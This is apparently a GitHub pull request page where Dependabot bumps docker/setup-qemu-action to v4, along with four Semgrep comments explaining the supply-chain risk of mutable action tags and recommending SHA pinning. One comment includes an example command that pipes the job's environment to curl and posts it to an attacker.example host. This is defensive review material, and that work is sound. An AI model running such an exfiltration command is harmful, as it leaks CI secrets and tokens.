Skip to content

chore(deps): bump docker/setup-qemu-action from 3 to 4#121

Open
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/github_actions/docker/setup-qemu-action-4
Open

chore(deps): bump docker/setup-qemu-action from 3 to 4#121
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/github_actions/docker/setup-qemu-action-4

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jul 1, 2026

Copy link
Copy Markdown
Contributor

Bumps docker/setup-qemu-action from 3 to 4.

Release notes

Sourced from docker/setup-qemu-action's releases.

v4.0.0

Full Changelog: docker/setup-qemu-action@v3.7.0...v4.0.0

v3.7.0

Full Changelog: docker/setup-qemu-action@v3.6.0...v3.7.0

v3.6.0

Full Changelog: docker/setup-qemu-action@v3.5.0...v3.6.0

v3.5.0

Full Changelog: docker/setup-qemu-action@v3.4.0...v3.5.0

v3.4.0

Full Changelog: docker/setup-qemu-action@v3.3.0...v3.4.0

v3.3.0

Full Changelog: docker/setup-qemu-action@v3.2.0...v3.3.0

v3.2.0

Full Changelog: docker/setup-qemu-action@v3.1.0...v3.2.0

v3.1.0

... (truncated)

Commits
  • 96fe6ef Merge pull request #315 from docker/dependabot/npm_and_yarn/docker/actions-to...
  • 31f08d3 [dependabot skip] chore: update generated content
  • 4e7017a build(deps): bump @​docker/actions-toolkit from 0.91.0 to 0.92.0
  • 0eca235 Merge pull request #314 from crazy-max/fix-yarn-preapprove-actions-toolkit
  • ea66a41 chore: allow actions-toolkit to bypass yarn age gate
  • 451542b Merge pull request #308 from docker/dependabot/npm_and_yarn/undici-6.27.0
  • 532ae00 [dependabot skip] chore: update generated content
  • b6f5af6 build(deps): bump undici from 6.26.0 to 6.27.0
  • cf96b86 Merge pull request #304 from docker/dependabot/npm_and_yarn/tmp-0.2.7
  • f0ba643 [dependabot skip] chore: update generated content
  • Additional commits viewable in compare view

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

Bumps [docker/setup-qemu-action](https://github.com/docker/setup-qemu-action) from 3 to 4.
- [Release notes](https://github.com/docker/setup-qemu-action/releases)
- [Commits](docker/setup-qemu-action@v3...v4)

---
updated-dependencies:
- dependency-name: docker/setup-qemu-action
  dependency-version: '4'
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file github_actions Pull requests that update GitHub Actions code labels Jul 1, 2026
@dependabot dependabot Bot requested a review from a team as a code owner July 1, 2026 22:13
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file github_actions Pull requests that update GitHub Actions code labels Jul 1, 2026

- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@v4

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Semgrep identified an issue in your code:

docker/setup-qemu-action@v4 uses a movable tag, so a repointed v4 release could run attacker-controlled code in this workflow.

More details about this

docker/setup-qemu-action@v4 pulls the QEMU setup action from a movable v4 tag, not a fixed commit. Anyone who can repoint that tag in the docker/setup-qemu-action repository could change what runs in this job before Run Buildx, with your workflow’s permissions and access to repo data.

A plausible attack looks like this:

  1. An attacker compromises the action’s publishing process or maintainer account for docker/setup-qemu-action.
  2. They move the v4 tag to a new commit that adds malicious code to the action.
  3. When container_tests_musl runs, the Set up QEMU step executes that attacker-controlled commit because it uses docker/setup-qemu-action@v4.
  4. That code can read the checked-out repository from the earlier actions/checkout@v6 step, inspect workflow files, and access any credentials or tokens available to the job.
  5. It can then tamper with the environment used by docker buildx create and docker --debug buildx build, for example by altering the emulated build setup or exfiltrating data during the build for linux/${{ matrix.linux_arch }}.

To resolve this comment:

✨ Commit fix suggestion
  1. Replace the mutable tag in the uses value with a full 40-character commit SHA for docker/setup-qemu-action.
    Change uses: docker/setup-qemu-action@v4 to uses: docker/setup-qemu-action@<full-commit-sha>.

  2. Add the upstream version as a comment after the SHA so the workflow stays readable, for example uses: docker/setup-qemu-action@<full-commit-sha> # v4.x.y.

  3. Use the commit SHA from the exact release you intend to trust, taken from the action's release page or commit history, instead of a moving tag like v4.
    Pinning to a commit prevents the action owner from silently changing what runs in this job.

  4. Alternatively, if you need to keep automatic version updates, use a dependency updater to open PRs that change the pinned SHA explicitly, rather than referencing @v4 directly.

💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by github-actions-mutable-action-tag.

🛟 Help? Slack #semgrep-help or go/semgrep-help.

Resolution Options:

  • Fix the code
  • Reply /fp $reason (if security gap doesn’t exist)
  • Reply /ar $reason (if gap is valid but intentional; add mitigations/monitoring)
  • Reply /other $reason (e.g., test-only)

You can view more details about this finding in the Semgrep AppSec Platform.


- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@v4

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Semgrep identified an issue in your code:

docker/setup-qemu-action@v4 uses a movable tag, so a repointed v4 release could make this workflow run attacker-controlled code in the QEMU setup step.

More details about this

docker/setup-qemu-action@v4 pulls the v4 ref of the QEMU setup action, not a specific commit. If the owner of docker/setup-qemu-action — or anyone who compromises that repository — repoints v4 to a new commit, this workflow will run that new code during the Set up QEMU step before docker buildx build runs.

A plausible attack looks like this:

  1. An attacker gains control of the docker/setup-qemu-action repository or its release process and moves the v4 tag to a malicious commit.
  2. Your container_tests_glibc job starts, reaches uses: docker/setup-qemu-action@v4, and GitHub downloads the attacker-controlled version.
  3. That action executes in your runner with access to the job workspace and any credentials or tokens available to this workflow.
  4. The malicious action can read repository contents checked out by actions/checkout, steal GITHUB_TOKEN, alter the Docker/Buildx environment, or tamper with the cross-architecture test build that uses ${{ matrix.linux_arch }} and ${{ steps.get_nodejs_version.outputs.version }}.
  5. The job may still appear to succeed, while the attacker has already exfiltrated data or changed what gets built and tested.

To resolve this comment:

✨ Commit fix suggestion
  1. Replace the mutable action tag with a full 40-character commit SHA in the uses line for QEMU setup.
    Change uses: docker/setup-qemu-action@v4 to uses: docker/setup-qemu-action@<full-commit-sha>.

  2. Keep the current version as a comment so the pinned SHA is easier to track later.
    Use the same format as uses: docker/setup-qemu-action@<full-commit-sha> # v4.x.y.

  3. Get the SHA from the exact action release you intend to trust, and pin to that commit instead of the major tag.
    For example, use docker/setup-qemu-action@<40-hex-sha> rather than docker/setup-qemu-action@v4.

  4. Apply the same pinning format to the other GitHub Actions in this workflow that still use mutable refs, such as actions/checkout@v6, actions/setup-node@v6, and docker/setup-buildx-action@v3, so each uses: value ends with a full commit SHA. Pinning to a commit SHA prevents the referenced action from changing silently if a tag is moved.

💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by github-actions-mutable-action-tag.

🛟 Help? Slack #semgrep-help or go/semgrep-help.

Resolution Options:

  • Fix the code
  • Reply /fp $reason (if security gap doesn’t exist)
  • Reply /ar $reason (if gap is valid but intentional; add mitigations/monitoring)
  • Reply /other $reason (e.g., test-only)

You can view more details about this finding in the Semgrep AppSec Platform.


- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@v4

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Semgrep identified an issue in your code:

docker/setup-qemu-action@v4 uses a movable tag, so upstream changes to v4 could make this workflow run attacker-controlled code in CI.

More details about this

docker/setup-qemu-action@v4 is pulled by a movable tag in this workflow step, so the code that runs during Set up QEMU can change without this repository changing. If the owner of docker/setup-qemu-action republishes v4, or an attacker gains control of that action and retags v4, your container_tests_musl job will execute the new action code before docker buildx create and the later Docker build commands.

A plausible attack looks like this:

  1. An attacker gets the ability to change what docker/setup-qemu-action@v4 points to.
  2. They publish a new commit behind v4 that adds a step to read runner data such as the checked-out repository, workflow-provided environment variables, and the Docker session available to the job.
  3. When this workflow runs, the Set up QEMU step fetches that attacker-controlled commit because it uses @v4 instead of a full commit SHA.
  4. The malicious action runs in your GitHub Actions runner and can exfiltrate repository contents or tamper with the environment used by the later Run Buildx step, for example by modifying the builder setup or leaking anything accessible to the job over curl.

Because the reference is mutable, the behavior of this CI job can be silently changed upstream with no diff in this repository.

To resolve this comment:

✨ Commit fix suggestion

Suggested change
uses: docker/setup-qemu-action@v4
uses: docker/setup-qemu-action@e81b0b7f02c02679f63d4497631f4586d7b62c5f # v4.2.0
View step-by-step instructions
  1. Replace the mutable action reference with a full 40-character commit SHA in the uses line for QEMU setup.
  2. Update uses: docker/setup-qemu-action@v4 to uses: docker/setup-qemu-action@<full-commit-sha> and, if helpful, add the released version as a comment, for example uses: docker/setup-qemu-action@<full-commit-sha> # v4.x.y.
  3. Choose the SHA from the exact docker/setup-qemu-action release you want to trust, instead of a tag like v4. Pinning to a commit SHA prevents the action owner from silently moving the tag to different code later.
💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by github-actions-mutable-action-tag.

🛟 Help? Slack #semgrep-help or go/semgrep-help.

Resolution Options:

  • Fix the code
  • Reply /fp $reason (if security gap doesn’t exist)
  • Reply /ar $reason (if gap is valid but intentional; add mitigations/monitoring)
  • Reply /other $reason (e.g., test-only)

You can view more details about this finding in the Semgrep AppSec Platform.


- name: Set up QEMU
uses: docker/setup-qemu-action@v3
uses: docker/setup-qemu-action@v4

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Semgrep identified an issue in your code:

The Set up QEMU step uses docker/setup-qemu-action@v4, a mutable tag that can be silently repointed to malicious code and then run in this workflow.

More details about this

docker/setup-qemu-action@v4 in the Set up QEMU step is pinned to the mutable v4 tag, not a specific commit. If the owner repoints v4 to a different commit, this job will automatically run that new code on ubuntu-latest before your docker buildx commands, with access to the job’s workspace and any credentials available to the workflow.

A plausible attack looks like this:

  1. An attacker compromises the docker/setup-qemu-action repository or a maintainer account.
  2. They move the v4 tag to a malicious commit.
  3. When container_tests_glibc runs, uses: docker/setup-qemu-action@v4 pulls and executes the attacker’s code in the Set up QEMU step.
  4. That code can read files checked out by actions/checkout@v6, inspect environment variables and tokens exposed to the job, and tamper with later steps like Set up Docker Buildx or the docker buildx build command.
  5. For example, the malicious action could run env | curl -X POST https://attacker.example/leak --data-binary @- or modify build inputs so the uploaded prebuilds/ artifacts contain attacker-controlled content.

Because the reference is a tag, the workflow can start running different code later without any change in this repository.

To resolve this comment:

✨ Commit fix suggestion
  1. Replace the mutable action reference with a full 40-character commit SHA in the uses line for QEMU setup.
  2. Keep the current version as an inline comment so it is still easy to see the intended release, for example: uses: docker/setup-qemu-action@<full-40-char-commit-sha> # v4.
  3. Resolve the SHA from the exact v4 release you intend to trust, and use that commit instead of the tag. Pinning to a commit prevents the action owner from silently moving the tag to different code later.
💬 Ignore this finding

Reply with Semgrep commands to ignore this finding.

  • /fp <comment> for false positive
  • /ar <comment> for acceptable risk
  • /other <comment> for all other reasons

Alternatively, triage in Semgrep AppSec Platform to ignore the finding created by github-actions-mutable-action-tag.

🛟 Help? Slack #semgrep-help or go/semgrep-help.

Resolution Options:

  • Fix the code
  • Reply /fp $reason (if security gap doesn’t exist)
  • Reply /ar $reason (if gap is valid but intentional; add mitigations/monitoring)
  • Reply /other $reason (e.g., test-only)

You can view more details about this finding in the Semgrep AppSec Platform.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file github_actions Pull requests that update GitHub Actions code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants